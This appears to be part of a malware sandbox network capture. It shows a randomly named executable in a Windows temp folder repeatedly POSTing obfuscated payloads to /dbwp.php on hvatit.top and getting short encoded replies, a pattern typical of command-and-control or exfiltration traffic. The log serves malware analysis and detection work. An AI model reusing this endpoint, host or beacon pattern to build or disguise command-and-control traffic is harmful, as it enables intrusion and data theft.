                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:45.052285910 CEST2560OUTData Raw: 5f 58 5c 54 5f 5e 50 50 5d 5f 54 57 54 5d 5b 5d 5a 5d 59 5a 52 53 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\T_^PP]_TWT][]Z]YZRST\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-32*C+94R"= .,_ ++'''5#Z0=(;?Z?V8?!]'/Z,1
                                                        Aug 31, 2024 09:32:45.378747940 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:45.515932083 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        40192.168.2.44977680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:45.646215916 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:46.005579948 CEST2560OUTData Raw: 5a 5b 59 5f 5a 59 55 50 5d 5f 54 57 54 5a 5b 53 5a 5d 59 5f 52 51 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z[Y_ZYUP]_TWTZ[SZ]Y_RQT^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.':+_(U#-;: R$'$+3>%?8#(,W;/!]'/Z,-
                                                        Aug 31, 2024 09:32:46.391247988 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:46.507901907 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        41192.168.2.44977780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:46.631247044 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:46.989859104 CEST2560OUTData Raw: 5a 54 5c 53 5a 5d 50 50 5d 5f 54 57 54 5d 5b 52 5a 55 59 53 52 5d 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZT\SZ]PP]_TWT][RZUYSR]T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y&!.C(7#-(,<#; $(W3#0=R(3_=?;T8?!]'/Z,1
                                                        Aug 31, 2024 09:32:47.326651096 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:47.465567112 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        42192.168.2.44977880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:47.585197926 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:47.942960024 CEST2560OUTData Raw: 5a 5f 59 51 5f 58 50 56 5d 5f 54 57 54 5e 5b 5d 5a 54 59 5a 52 5c 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_YQ_XPV]_TWT^[]ZTYZR\T_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z&1B+9$5(:Z;Z#8$$9?&5Z0?#_<Z7V,/!]'/Z,=
                                                        Aug 31, 2024 09:32:48.248292923 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:48.375761032 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        43192.168.2.44977980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:48.509263992 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        44192.168.2.44978080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:48.683661938 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1408
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:49.036638021 CEST1408OUTData Raw: 5f 5e 5c 51 5a 5a 55 57 5d 5f 54 57 54 5a 5b 5d 5a 55 59 5b 52 54 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^\QZZUW]_TWTZ[]ZUY[RTT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3"%+9(U6 .(";?0;$%'.&(]<,,!]'/Z,-
                                                        Aug 31, 2024 09:32:49.389962912 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:49.531050920 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 56 24 2b 36 57 37 05 29 0e 29 5a 2d 54 27 09 2f 10 2f 21 00 5e 29 17 1a 07 2a 04 3f 0d 33 03 0e 5a 30 38 0b 0d 26 2f 09 0a 25 34 21 5b 07 10 21 00 32 07 23 5b 2c 12 0f 06 32 30 2e 03 37 0f 04 16 2a 04 39 10 22 28 3d 19 30 06 08 54 2f 29 36 57 2b 3d 20 00 3d 2b 3c 12 25 02 2b 50 00 12 26 57 32 01 38 1f 35 07 36 1d 22 38 3c 0c 24 35 02 01 20 2b 3f 03 2b 2b 3a 0b 25 2c 21 0d 23 56 39 1c 26 22 2d 07 2b 07 33 57 2a 16 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #V$+6W7))Z-T'//!^)*?3Z08&/%4![!2#[,20.7*9"(=0T/)6W+= =+<%+P&W2856"8<$5 +?++:%,!#V9&"-+3W*&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        45192.168.2.44978180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:48.813684940 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:49.161680937 CEST2560OUTData Raw: 5a 55 5c 54 5a 54 50 54 5d 5f 54 57 54 5c 5b 5c 5a 56 59 52 52 50 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZU\TZTPT]_TWT\[\ZVYRRPTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X'!-?9(S5X$.7[403)(Q&5?^02S<?]?'W/!]'/Z,5
                                                        Aug 31, 2024 09:32:49.490449905 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:49.621691942 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:49 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        46192.168.2.44978280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:49.739918947 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:50.099323988 CEST2560OUTData Raw: 5f 58 5c 52 5a 5c 50 55 5d 5f 54 57 54 5d 5b 52 5a 56 59 5e 52 55 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\RZ\PU]_TWT][RZVY^RUTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]$2*<<U">(]:;^#;8U09?37_3>&U<(+/?!]'/Z,1
                                                        Aug 31, 2024 09:32:50.413836002 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:50.543962002 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        47192.168.2.44978480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:50.669291973 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:51.021019936 CEST2560OUTData Raw: 5f 5f 5c 51 5a 5b 55 57 5d 5f 54 57 54 5e 5b 51 5a 52 59 5b 52 5d 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: __\QZ[UW]_TWT^[QZRY[R]TRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.]$.A=)?6._-,7+<R&*#36+0(;'+#T/!]'/Z,=
                                                        Aug 31, 2024 09:32:51.332396030 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:51.463953972 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:50 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        48192.168.2.44978580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:51.601550102 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:51.958615065 CEST2560OUTData Raw: 5a 5d 59 56 5f 5e 55 56 5d 5f 54 57 54 5c 5b 52 5a 55 59 59 52 53 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z]YV_^UV]_TWT\[RZUYYRSTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.01?)T"4_./848(W':<&%;'(3^< 8!]'/Z,5
                                                        Aug 31, 2024 09:32:52.285000086 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:52.480930090 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        49192.168.2.44978680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:52.602215052 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:52.958568096 CEST2560OUTData Raw: 5a 5c 5c 52 5a 5f 50 52 5d 5f 54 57 54 51 5b 54 5a 5c 59 5d 52 51 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\RZ_PR]_TWTQ[TZ\Y]RQT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.$"9?) R!.<9?/7(3*3$6('[9<\=<+8!]'/Z,
                                                        Aug 31, 2024 09:32:53.292845964 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:53.492141008 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        50192.168.2.44978780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:53.616319895 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:53.974539995 CEST2560OUTData Raw: 5a 59 59 57 5a 5b 55 52 5d 5f 54 57 54 59 5b 5d 5a 50 59 53 52 51 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZYYWZ[UR]_TWTY[]ZPYSRQT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X3B?_76.^-?74;'?'/Z'=+++\(</R.?!]'/Z,!
                                                        Aug 31, 2024 09:32:54.280605078 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:54.478384972 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        51192.168.2.44978880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:54.542828083 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        52192.168.2.44978980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:54.606400013 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:54.958638906 CEST2560OUTData Raw: 5f 58 5c 51 5f 58 50 53 5d 5f 54 57 54 59 5b 54 5a 52 59 5d 52 5c 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _X\Q_XPS]_TWTY[TZRY]R\T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.[31-=)'#.Z-,#Y7?'\4$%&>!(83=/(./!]'/Z,!
                                                        Aug 31, 2024 09:32:55.290810108 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:55.487972975 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        53192.168.2.44979080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:55.616673946 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:55.974212885 CEST2560OUTData Raw: 5a 5f 5c 52 5f 5a 50 54 5d 5f 54 57 54 5f 5b 51 5a 52 59 5c 52 50 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_\R_ZPT]_TWT_[QZRY\RPTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.3!B<;!.:/430'C+02T<;+/8?!]'/Z,
                                                        Aug 31, 2024 09:32:56.327167988 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:56.457505941 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        54192.168.2.44979180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:56.585948944 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:56.942959070 CEST2560OUTData Raw: 5a 54 59 5e 5f 59 50 5d 5d 5f 54 57 54 5c 5b 52 5a 5c 59 5e 52 5c 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTY^_YP]]_TWT\[RZ\Y^R\TZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.&!"@<8#-':/^7( U3*Q3&8'-T+(,<</!]'/Z,5
                                                        Aug 31, 2024 09:32:57.269768953 CEST25INHTTP/1.1 100 Continue
